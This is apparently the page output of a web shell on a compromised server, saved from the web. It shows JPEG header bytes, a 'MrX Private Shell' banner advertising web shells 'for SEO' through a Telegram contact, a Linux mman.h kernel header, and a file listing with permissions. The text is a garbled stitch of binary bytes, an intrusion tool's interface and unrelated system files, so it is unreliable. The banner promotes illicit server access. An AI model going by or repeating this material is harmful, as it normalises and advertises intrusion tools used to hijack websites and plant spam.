����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
#ifndef _UAPI_LINUX_MMAN_H
#define _UAPI_LINUX_MMAN_H
#include <asm/mman.h>
#include <asm-generic/hugetlb_encode.h>
#include <linux/types.h>
#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define MREMAP_DONTUNMAP 4
#define OVERCOMMIT_GUESS 0
#define OVERCOMMIT_ALWAYS 1
#define OVERCOMMIT_NEVER 2
#define MAP_SHARED 0x01 /* Share changes */
#define MAP_PRIVATE 0x02 /* Changes are private */
#define MAP_SHARED_VALIDATE 0x03 /* share + validate extension flags */
/*
* Huge page size encoding when MAP_HUGETLB is specified, and a huge page
* size other than the default is desired. See hugetlb_encode.h.
* All known huge page size encodings are provided here. It is the
* responsibility of the application to know which sizes are supported on
* the running system. See mmap(2) man page for details.
*/
#define MAP_HUGE_SHIFT HUGETLB_FLAG_ENCODE_SHIFT
#define MAP_HUGE_MASK HUGETLB_FLAG_ENCODE_MASK
#define MAP_HUGE_16KB HUGETLB_FLAG_ENCODE_16KB
#define MAP_HUGE_64KB HUGETLB_FLAG_ENCODE_64KB
#define MAP_HUGE_512KB HUGETLB_FLAG_ENCODE_512KB
#define MAP_HUGE_1MB HUGETLB_FLAG_ENCODE_1MB
#define MAP_HUGE_2MB HUGETLB_FLAG_ENCODE_2MB
#define MAP_HUGE_8MB HUGETLB_FLAG_ENCODE_8MB
#define MAP_HUGE_16MB HUGETLB_FLAG_ENCODE_16MB
#define MAP_HUGE_32MB HUGETLB_FLAG_ENCODE_32MB
#define MAP_HUGE_256MB HUGETLB_FLAG_ENCODE_256MB
#define MAP_HUGE_512MB HUGETLB_FLAG_ENCODE_512MB
#define MAP_HUGE_1GB HUGETLB_FLAG_ENCODE_1GB
#define MAP_HUGE_2GB HUGETLB_FLAG_ENCODE_2GB
#define MAP_HUGE_16GB HUGETLB_FLAG_ENCODE_16GB
struct cachestat_range {
__u64 off;
__u64 len;
};
struct cachestat {
__u64 nr_cache;
__u64 nr_dirty;
__u64 nr_writeback;
__u64 nr_evicted;
__u64 nr_recently_evicted;
};
#endif /* _UAPI_LINUX_MMAN_H */
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| tc_act | Folder | 0755 |
|
|
| bits.h | File | 462 B | 0644 |
|
| bpf.h | File | 272.12 KB | 0644 |
|
| bpf_common.h | File | 1.35 KB | 0644 |
|
| bpf_perf_event.h | File | 544 B | 0644 |
|
| btf.h | File | 5.47 KB | 0644 |
|
| const.h | File | 1002 B | 0644 |
|
| erspan.h | File | 1.05 KB | 0644 |
|
| ethtool.h | File | 3.72 KB | 0644 |
|
| fadvise.h | File | 842 B | 0644 |
|
| filter.h | File | 2.16 KB | 0644 |
|
| fscrypt.h | File | 6.47 KB | 0644 |
|
| hw_breakpoint.h | File | 757 B | 0644 |
|
| if_link.h | File | 33.66 KB | 0644 |
|
| if_tun.h | File | 4.02 KB | 0644 |
|
| if_xdp.h | File | 5.29 KB | 0644 |
|
| in.h | File | 10.17 KB | 0644 |
|
| io_uring.h | File | 18.8 KB | 0644 |
|
| kcmp.h | File | 537 B | 0644 |
|
| kvm.h | File | 47.37 KB | 0644 |
|
| memfd.h | File | 1.43 KB | 0644 |
|
| mman.h | File | 1.76 KB | 0644 |
|
| netdev.h | File | 5.66 KB | 0644 |
|
| netlink.h | File | 7.71 KB | 0644 |
|
| perf_event.h | File | 42.7 KB | 0644 |
|
| pkt_cls.h | File | 12.26 KB | 0644 |
|
| pkt_sched.h | File | 24.27 KB | 0644 |
|
| seccomp.h | File | 5.64 KB | 0644 |
|
| seg6.h | File | 1.15 KB | 0644 |
|
| seg6_local.h | File | 2.02 KB | 0644 |
|
| stat.h | File | 7.27 KB | 0644 |
|
| stddef.h | File | 1.5 KB | 0644 |
|
| tcp.h | File | 11.51 KB | 0644 |
|
| tls.h | File | 2.75 KB | 0644 |
|
| types.h | File | 665 B | 0644 |
|
| userfaultfd.h | File | 11.74 KB | 0644 |
|